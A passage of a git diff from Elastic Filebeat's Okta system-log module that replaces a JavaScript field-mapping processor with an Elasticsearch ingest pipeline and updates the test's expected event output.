tHO8CamoJTAoi5oS8oGvMwp2IDnlaPvNQAAcDAc4q84UD/aJchq9jDMIAbOXf+SZQvmB90KXduK2pLLDUFOvvRa0/HW/f/3oWJYzBm+VAyg3KPd6hmm8Fc4zE2X5MGJKROwzvH5pIRkeujqs/9yrCFQIh3Xp17PvRmBSviNANPOAKw0fifFvPIzrZAUfBbdBPEAYfgkd0P2KLr5hpR/AgAA//9RmUaQ" } diff --git a/x-pack/filebeat/module/okta/system/config/input.yml b/x-pack/filebeat/module/okta/system/config/input.yml index 107dd3ca320e..05ff819fad0a 100644 --- a/x-pack/filebeat/module/okta/system/config/input.yml +++ b/x-pack/filebeat/module/okta/system/config/input.yml @@ -25,7 +25,7 @@ request.transforms: - set: target: url.params.since value: "[[.cursor.published]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}")) "RFC3339"]]' response.pagination: - set: @@ -50,13 +50,17 @@ tags: {{.tags | tojson}} publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} processors: - - script: - lang: javascript - id: okta_system_script - file: ${path.home}/module/okta/system/config/pipeline.js - params: - keep_original_message: {{ .keep_original_message }} + - decode_json_fields: + fields: + - message + target: json +{{ if eq .keep_original_message true }} + - rename: + fields: + - from: message + to: event.original +{{ end }} - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/okta/system/config/pipeline.js b/x-pack/filebeat/module/okta/system/config/pipeline.js deleted file mode 100644 index 0d381b0944d6..000000000000 --- a/x-pack/filebeat/module/okta/system/config/pipeline.js +++ /dev/null @@ -1,215 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -function OktaSystem(keep_original_message) { - var processor = require("processor"); - - var decodeJson = new processor.DecodeJSONFields({ - fields: ["message"], - target: "json", - }); - - var setId = function(evt) { - var oktaUuid = evt.Get("json.uuid"); - if (oktaUuid) { - evt.Put("@metadata._id", oktaUuid); - } - }; - - var parseTimestamp = new processor.Timestamp({ - field: "json.published", - timezone: "UTC", - layouts: ["2006-01-02T15:04:05.999Z"], - tests: ["2020-02-05T18:19:23.599Z"], - ignore_missing: true, - }); - - var saveOriginalMessage = function(evt) {}; - if (keep_original_message) { - saveOriginalMessage = new processor.Convert({ - fields: [ - {from: "message", to: "event.original"} - ], - mode: "rename" - }); - } - - var dropOriginalMessage = function(evt) { - evt.Delete("message"); - }; - - var categorizeEvent = new processor.AddFields({ - target: "event", - fields: { - category: ["authentication"], - kind: "event", - type: ["access"], - - }, - }); - - var convertFields = new processor.Convert({ - fields: [ - { from: "json.displayMessage", to: "okta.display_message" }, - { from: "json.eventType", to: "okta.event_type" }, - { from: "json.uuid", to: "okta.uuid" }, - { from: "json.actor.alternateId", to: "okta.actor.alternate_id" }, - { from: "json.actor.displayName", to: "okta.actor.display_name" }, - { from: "json.actor.id", to: "okta.actor.id" }, - { from: "json.actor.type", to: "okta.actor.type" }, - { from: "json.client.device", to: "okta.client.device" }, - { from: "json.client.geographicalContext.geolocation", to: "client.geo.location" }, - { from: "json.client.geographicalContext.city", to: "client.geo.city_name" }, - { from: "json.client.geographicalContext.state", to: "client.geo.region_name" }, - { from: "json.client.geographicalContext.country", to: "client.geo.country_name" }, - { from: "json.client.id", to: "okta.client.id" }, - { from: "json.client.ipAddress", to: "okta.client.ip" }, - { from: "json.client.userAgent.browser", to: "okta.client.user_agent.browser" }, - { from: "json.client.userAgent.os", to: "okta.client.user_agent.os" }, - { from: "json.client.userAgent.rawUserAgent", to: "okta.client.user_agent.raw_user_agent" }, - { from: "json.client.zone", to: "okta.client.zone" }, - { from: "json.outcome.reason", to: "okta.outcome.reason" }, - { from: "json.outcome.result", to: "okta.outcome.result" }, - { from: "json.target", to: "okta.target" }, - { from: "json.transaction.id", to: "okta.transaction.id" }, - { from: "json.transaction.type", to: "okta.transaction.type" }, - { from: "json.debugContext.debugData.deviceFingerprint", to: "okta.debug_context.debug_data.device_fingerprint" }, - { from: "json.debugContext.debugData.requestId", to: "okta.debug_context.debug_data.request_id" }, - { from: "json.debugContext.debugData.requestUri", to: "okta.debug_context.debug_data.request_uri" }, - { from: "json.debugContext.debugData.threatSuspected", to: "okta.debug_context.debug_data.threat_suspected" }, - { from: "json.debugContext.debugData.url", to: "okta.debug_context.debug_data.url" }, - { from: "json.authenticationContext.authenticationProvider", to: "okta.authentication_context.authentication_provider" }, - { from: "json.authenticationContext.authenticationStep", to: "okta.authentication_context.authentication_step" }, - { from: "json.authenticationContext.credentialProvider", to: "okta.authentication_context.credential_provider" }, - { from: "json.authenticationContext.credentialType", to: "okta.authentication_context.credential_type" }, - { from: "json.authenticationContext.externalSessionId", to: "okta.authentication_context.external_session_id" }, - { from: "json.authenticationContext.interface", to: "okta.authentication_context.authentication_provider" }, - { from: "json.authenticationContext.issuer", to: "okta.authentication_context.issuer" }, - { from: "json.securityContext.asNumber", to: "okta.security_context.as.number" }, - { from: "json.securityContext.asOrg", to: "okta.security_context.as.organization.name" }, - { from: "json.securityContext.domain", to: "okta.security_context.domain" }, - { from: "json.securityContext.isProxy", to: "okta.security_context.is_proxy" }, - { from: "json.securityContext.isp", to: "okta.security_context.isp" }, - ], - mode: "rename", - ignore_missing: true, - fail_on_error: false, - }); - - var copyFields = new processor.Convert({ - fields: [ - { from: "okta.client.user_agent.raw_user_agent", to: "user_agent.original" }, - { from: "okta.client.ip", to: "client.ip" }, - { from: "okta.client.ip", to: "source.ip" }, - { from: "okta.event_type", to: "event.action" }, - { from: "okta.security_context.as.number", to: "client.as.number" }, - { from: "okta.security_context.as.organization.name", to: "client.as.organization.name" }, - { from: "okta.security_context.domain", to: "client.domain" }, - { from: "okta.security_context.domain", to: "source.domain" }, - { from: "okta.uuid", to: "event.id" }, - ], - ignore_missing: true, - fail_on_error: false, - }); - - var setEventOutcome = function(evt) { - var outcome = evt.Get("okta.outcome.result"); - if (outcome) { - outcome = outcome.toLowerCase(); - if (outcome === "success" || outcome === "allow") { - evt.Put("event.outcome", "success"); - } else if (outcome === "failure" || outcome === "deny") { - evt.Put("event.outcome", "failure"); - } else { - evt.Put("event.outcome", "unknown"); - } - } - }; - - // Update nested fields - var renameNestedFields = function(evt) { - var arr = evt.Get("okta.target"); - if (arr) { - for (var i = 0; i < arr.length; i++) { - arr[i].alternate_id = arr[i].alternateId; - arr[i].display_name = arr[i].displayName; - delete arr[i].alternateId; - delete arr[i].displayName; - delete arr[i].detailEntry; - } - } - }; - - // Set user info if actor type is User - var setUserInfo = function(evt) { - if (evt.Get("okta.actor.type") === "User") { - evt.Put("client.user.full_name", evt.Get("okta.actor.display_name")); - evt.Put("source.user.full_name", evt.Get("okta.actor.display_name")); - evt.Put("related.user", evt.Get("okta.actor.display_name")); - evt.Put("client.user.id", evt.Get("okta.actor.id")); - evt.Put("source.user.id", evt.Get("okta.actor.id")); - } - }; - - // Set related.ip field - var setRelatedIP = function(event) { - var ip = event.Get("source.ip"); - if (ip) { - event.AppendTo("related.ip", ip); - } - ip = event.Get("destination.ip"); - if (ip) { - event.AppendTo("related.ip", ip); - } - }; - - // Drop extra fields - var dropExtraFields = function(evt) { - evt.Delete("json"); - }; - - // Remove null fields - var dropNullFields = function(evt) { - function dropNull(obj) { - Object.keys(obj).forEach(function(key) { - (obj[key] && typeof obj[key] === 'object') && dropNull(obj[key]) || - (obj[key] === null) && delete obj[key]; - }); - return obj; - } - dropNull(evt); - }; - - var pipeline = new processor.Chain() - .Add(decodeJson) - .Add(setId) - .Add(parseTimestamp) - .Add(saveOriginalMessage) - .Add(dropOriginalMessage) - .Add(categorizeEvent) - .Add(convertFields) - .Add(copyFields) - .Add(setEventOutcome) - .Add(renameNestedFields) - .Add(setUserInfo) - .Add(setRelatedIP) - .Add(dropExtraFields) - .Add(dropNullFields) - .Build(); - - return { - process: pipeline.Run, - }; -} - -var oktaSystem; - -// Register params from configuration. -function register(params) { - oktaSystem = new OktaSystem(params.keep_original_message); -} - -function process(evt) { - return oktaSystem.process(evt); -} diff --git a/x-pack/filebeat/module/okta/system/ingest/pipeline.yml b/x-pack/filebeat/module/okta/system/ingest/pipeline.yml index 0da85185ca24..dc576e9c70c7 100644 --- a/x-pack/filebeat/module/okta/system/ingest/pipeline.yml +++ b/x-pack/filebeat/module/okta/system/ingest/pipeline.yml @@ -4,6 +4,503 @@ processors: - set: field: event.ingested value: "{{_ingest.timestamp}}" + - script: + description: Drops null/empty values recursively + lang: painless + source: | + boolean drop(Object o) { + if (o == null || o == "") { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - remove: + field: message + ignore_missing: true + - convert: + field: json.uuid + target_field: _id + type: string + ignore_failure: true + if: ctx?.json?.uuid != null && ctx?.json?.uuid != "" + - date: + field: json.published + formats: + - ISO8601 + ignore_failure: true + - set: + field: event.kind + value: event + - rename: + field: json.displayMessage + target_field: okta.display_message + ignore_missing: true + ignore_failure: true + - rename: + field: json.eventType + target_field: okta.event_type + ignore_missing: true + ignore_failure: true + - append: + field: event.category + value: iam + if: | + ["group.user_membership.add","group.user_membership.remove", + "user.lifecycle.activate","user.lifecycle.create", + "user.lifecycle.deactivate","user.lifecycle.suspend", + "user.lifecycle.unsuspend"].contains(ctx?.okta?.event_type) + - append: + field: event.category + value: configuration + if: | + ["policy.lifecycle.activate","policy.lifecycle.create", + "policy.lifecycle.deactivate","policy.lifecycle.delete", + "policy.lifecycle.update","policy.rule.activate","policy.rule.add", + "policy.rule.deactivate","policy.rule.delete", + "application.lifecycle.create","application.lifecycle.delete", + "policy.rule.update","application.lifecycle.activate", + "application.lifecycle.deactivate","application.lifecycle.update"].contains(ctx?.okta?.event_type) + - append: + field: event.category + value: authentication + if: '["user.session.start","user.session.end","user.authentication.sso","policy.evaluate_sign_on"].contains(ctx?.okta?.event_type)' + - append: + field: event.category + value: session + if: '["user.session.start","user.session.end"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: info + if: | + ["system.org.rate_limit.warning","system.org.rate_limit.violation", + "core.concurrency.org.limit.violation"].contains(ctx?.okta?.event_type) + - append: + field: event.type + value: network + if: '["security.request.blocked"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: network + if: | + ["system.org.rate_limit.warning","system.org.rate_limit.violation", + "core.concurrency.org.limit.violation","security.request.blocked"].contains(ctx?.okta?.event_type) + - append: + field: event.type + value: start + if: '["user.session.start"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: end + if: '["user.session.end"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: group + if: '["group.user_membership.add","group.user_membership.remove"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: user + if: | + ["user.lifecycle.activate","user.lifecycle.create", + "user.lifecycle.deactivate","user.lifecycle.suspend", + "user.lifecycle.unsuspend","user.authentication.sso", + "user.session.start","user.session.end","application.user_membership.add", + "application.user_membership.remove","application.user_membership.change_username"].contains(ctx?.okta?.event_type) + - append: + field: event.type + value: change + if: | + ["user.lifecycle.activate","user.lifecycle.deactivate", + "user.lifecycle.suspend","user.lifecycle.unsuspend", + "group.user_membership.add","group.user_membership.remove", + "policy.lifecycle.activate","policy.lifecycle.deactivate", + "policy.lifecycle.update","policy.rule.activate","policy.rule.add", + "policy.rule.deactivate","policy.rule.update","application.user_membership.add", + "application.user_membership.remove","application.user_membership.change_username"].contains(ctx?.okta?.event_type) + - append: + field: event.type + value: creation + if: '["user.lifecycle.create","policy.lifecycle.create","application.lifecycle.create"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: deletion + if: '["policy.lifecycle.delete","application.lifecycle.delete"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: info + if: '["policy.evaluate_sign_on"].contains(ctx?.okta?.event_type)' + - rename: + field: json.uuid + target_field: okta.uuid + ignore_missing: true + ignore_failure: true + - rename: + field: json.actor.alternateId + target_field: okta.actor.alternate_id + ignore_missing: true + ignore_failure: true + - rename: + field: json.actor.displayName + target_field: okta.actor.display_name + ignore_missing: true + ignore_failure: true + - rename: + field: json.actor.id + target_field: okta.actor.id + ignore_missing: true + ignore_failure: true + - rename: + field: json.actor.type + target_field: okta.actor.type + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.device + target_field: okta.client.device + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.geographicalContext.geolocation + target_field: client.geo.location + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.geographicalContext.city + target_field: client.geo.city_name + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.geographicalContext.state + target_field: client.geo.region_name + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.geographicalContext.country + target_field: client.geo.country_name + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.id + target_field: okta.client.id + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.ipAddress + target_field: okta.client.ip + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.userAgent.browser + target_field: okta.client.user_agent.browser + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.userAgent.os + target_field: okta.client.user_agent.os + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.userAgent.rawUserAgent + target_field: okta.client.user_agent.raw_user_agent + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.zone + target_field: okta.client.zone + ignore_missing: true + ignore_failure: true + - rename: + field: json.outcome.reason + target_field: okta.outcome.reason + ignore_missing: true + ignore_failure: true + - rename: + field: json.outcome.result + target_field: okta.outcome.result + ignore_missing: true + ignore_failure: true + - rename: + field: json.target + target_field: okta.target + ignore_missing: true + ignore_failure: true + - rename: + field: json.transaction.id + target_field: okta.transaction.id + ignore_missing: true + ignore_failure: true + - rename: + field: json.transaction.type + target_field: okta.transaction.type + ignore_missing: true + ignore_failure: true + - rename: + field: json.debugContext.debugData.deviceFingerprint + target_field: okta.debug_context.debug_data.device_fingerprint + ignore_missing: true + ignore_failure: true + - rename: + field: json.debugContext.debugData.requestId + target_field: okta.debug_context.debug_data.request_id + ignore_missing: true + ignore_failure: true + - rename: + field: json.debugContext.debugData.requestUri + target_field: okta.debug_context.debug_data.request_uri + ignore_missing: true + ignore_failure: true + - rename: + field: json.debugContext.debugData.threatSuspected + target_field: okta.debug_context.debug_data.threat_suspected + ignore_missing: true + ignore_failure: true + - rename: + field: json.debugContext.debugData.url + target_field: okta.debug_context.debug_data.url + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.authenticationProvider + target_field: okta.authentication_context.authentication_provider + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.authenticationStep + target_field: okta.authentication_context.authentication_step + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.credentialProvider + target_field: okta.authentication_context.credential_provider + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.credentialType + target_field: okta.authentication_context.credential_type + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.externalSessionId + target_field: okta.authentication_context.external_session_id + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.interface + target_field: okta.authentication_context.authentication_provider + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.issuer + target_field: okta.authentication_context.issuer + ignore_missing: true + ignore_failure: true + - rename: + field: json.securityContext.asNumber + target_field: okta.security_context.as.number + ignore_missing: true + ignore_failure: true + - rename: + field: json.securityContext.asOrg + target_field: okta.security_context.as.organization.name + ignore_missing: true + ignore_failure: true + - rename: + field: json.securityContext.domain + target_field: okta.security_context.domain + ignore_missing: true + ignore_failure: true + - rename: + field: json.securityContext.isProxy + target_field: okta.security_context.is_proxy + ignore_missing: true + ignore_failure: true + - rename: + field: json.securityContext.isp + target_field: okta.security_context.isp + ignore_missing: true + ignore_failure: true + - convert: + field: okta.client.user_agent.raw_user_agent + target_field: user_agent.original + type: string + ignore_failure: true + - convert: + field: okta.client.ip + target_field: client.ip + type: string + ignore_failure: true + - convert: + field: okta.client.ip + target_field: source.ip + type: string + ignore_failure: true + - convert: + field: okta.event_type + target_field: event.action + type: string + ignore_failure: true + - convert: + field: okta.security_context.as.number + target_field: client.as.number + type: string + ignore_failure: true + - convert: + field: okta.security_context.as.organization.name + target_field: client.as.organization.name + type: string + ignore_failure: true + - convert: + field: okta.security_context.domain + target_field: client.domain + type: string + ignore_failure: true + - convert: + field: okta.security_context.domain + target_field: source.domain + type: string + ignore_failure: true + - convert: + field: okta.uuid + target_field: event.id + type: string + ignore_failure: true + - lowercase: + field: okta.outcome.result + target_field: okta.outcome.result_lower + ignore_missing: true + - set: + field: event.outcome + value: success + if: ctx?.okta?.outcome?.result_lower != null && (ctx?.okta?.outcome?.result_lower == "success" || ctx?.okta?.outcome?.result_lower == "allow") + - set: + field: event.outcome + value: failure + if: ctx?.okta?.outcome?.result_lower != null && (ctx?.okta?.outcome?.result_lower == "failure" || ctx?.okta?.outcome?.result_lower == "deny") + - set: + field: event.outcome + value: unknown + if: ctx?.event?.outcome == null + - remove: + field: okta.outcome.result_lower + ignore_missing: true + - script: + lang: painless + source: | + def arr = ctx?.okta?.target; + if (arr != null) { + for (def i = 0; i < arr.length; i++) { + arr[i]["alternate_id"] = arr[i]["alternateId"]; + arr[i].remove("alternateId"); + arr[i]["display_name"] = arr[i]["displayName"]; + arr[i].remove("displayName"); + arr[i].remove("detailEntry"); + } + } + - script: + lang: painless + source: | + def arr = ctx?.okta?.target; + if (arr != null) { + for (def i = 0; i < arr.length; i++) { + if (arr[i]["type"].toLowerCase().contains("user")) { + ctx["okta_target_user"] = arr[i]; + break; + } + } + } + if: ctx?.okta?.event_type != null && ctx?.okta?.event_type.contains("user.") + - script: + lang: painless + source: | + def arr = ctx?.okta?.target; + if (arr != null) { + for (def i = 0; i < arr.length; i++) { + if (arr[i]["type"].toLowerCase().contains("group")) { + ctx["okta_target_group"] = arr[i]; + break; + } + } + } + if: ctx?.okta?.event_type != null && ctx?.okta?.event_type.contains("group.") + - rename: + field: okta_target_user.display_name + target_field: user.target.full_name + ignore_missing: true + - rename: + field: okta_target_user.id + target_field: user.target.id + ignore_missing: true + - rename: + field: okta_target_user.login + target_field: user.target.email + ignore_missing: true + - rename: + field: okta_target_group.display_name + target_field: user.target.group.name + ignore_missing: true + - rename: + field: okta_target_group.id + target_field: user.target.group.id + ignore_missing: true + - remove: + field: + - okta_target_user + - okta_target_group + ignore_missing: true + - set: + field: client.user.id + value: "{{okta.actor.id}}" + ignore_empty_value: true + if: ctx?.okta?.actor?.id != null + - set: + field: source.user.id + value: "{{okta.actor.id}}" + ignore_empty_value: true + if: ctx?.okta?.actor?.id != null + - set: + field: client.user.full_name + value: "{{okta.actor.display_name}}" + ignore_empty_value: true + if: ctx?.okta?.actor?.display_name != null + - set: + field: source.user.full_name + value: "{{okta.actor.display_name}}" + ignore_empty_value: true + if: ctx?.okta?.actor?.display_name != null + - set: + field: user.full_name + value: "{{okta.actor.display_name}}" + ignore_empty_value: true + if: ctx?.okta?.actor?.display_name != null + - append: + field: related.user + value: "{{okta.actor.display_name}}" + allow_duplicates: false + if: ctx?.okta?.actor?.display_name != null + - append: + field: related.user + value: "{{user.target.full_name}}" + allow_duplicates: false + if: ctx?.user?.target?.full_name != null + - append: + field: related.ip + value: "{{source.ip}}" + allow_duplicates: false + if: ctx?.source?.ip != null + - append: + field: related.ip + value: "{{destination.ip}}" + allow_duplicates: false + if: ctx?.destination?.ip != null + - remove: + field: json + ignore_missing: true - user_agent: field: user_agent.original ignore_missing: true diff --git a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json index 39d002441853..226b52efa7d6 100644 --- a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json +++ b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json @@ -11,7 +11,8 @@ "client.user.id": "00u1abvz4pYqdM8ms4x6", "event.action": "user.session.end", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "okta.system", "event.id": "faf7398a-4f77-11ea-97fb-5925e98228bd", @@ -20,7 +21,8 @@ "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}", "event.outcome": "success", "event.type": [ - "access" + "end", + "user" ], "fileset.name": "system", "input.type": "log", @@ -47,8 +49,12 @@ "okta.transaction.id": "XkccyyMli2Uay2I93ZgRzQAAB0c", "okta.transaction.type": "WEB", "okta.uuid": "faf7398a-4f77-11ea-97fb-5925e98228bd", - "related.ip": "108.255.197.247", - "related.user": "xxxxxx", + "related.ip": [ + "108.255.197.247" + ], + "related.user": [ + "xxxxxx" + ], "service.type": "okta", "source.as.number": 7018, "source.as.organization.name": "AT&T Services, Inc.", @@ -66,6 +72,7 @@ "tags": [ "forwarded" ], + "user.full_name": "xxxxxx", "user_agent.device.name": "Mac", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", @@ -86,7 +93,8 @@ "client.user.id": "00u1abvz4pYqdM8ms4x6", "event.action": "user.session.start", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "okta.system", "event.id": "3aeede38-4f67-11ea-abd3-1f5d113f2546", @@ -95,7 +103,8 @@ "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "event.outcome": "success", "event.type": [ - "access" + "start", + "user" ], "fileset.name": "system", "input.type": "log", @@ -123,8 +132,12 @@ "okta.transaction.id": "XkcAsWb8WjwDP76xh@1v8wAABp0", "okta.transaction.type": "WEB", "okta.uuid": "3aeede38-4f67-11ea-abd3-1f5d113f2546", - "related.ip": "108.255.197.247", - "related.user": "xxxxxx", + "related.ip": [ + "108.255.197.247" + ], + "related.user": [ + "xxxxxx" + ], "service.type": "okta", "source.as.number": 7018, "source.as.organization.name": "AT&T Services, Inc.", @@ -142,6 +155,7 @@ "tags": [ "forwarded" ], + "user.full_name": "xxxxxx", "user_agent.device.name": "Mac", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", @@ -171,7 +185,7 @@ "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "event.outcome": "success", "event.type": [ - "access" + "info" ], "fileset.name": "system", "input.type": "log", @@ -214,8 +228,12 @@ "okta.transaction.id": "XkcAsWb8WjwDP76xh@1v8wAABp0", "okta.transaction.type": "WEB", "okta.uuid": "3af594f9-4f67-11ea-abd3-1f5d113f2546", - "related.ip": "108.255.197.247", - "related.user": "xxxxxx", + "related.ip": [ + "108.255.197.247" + ], + "related.user": [ + "xxxxxx" + ], "service.type": "okta", "source.as.number": 7018, "source.as.organization.name": "AT&T Services, Inc.", @@ -233,6 +251,7 @@ "tags": [ "forwarded" ], + "user.full_name": "xxxxxx", 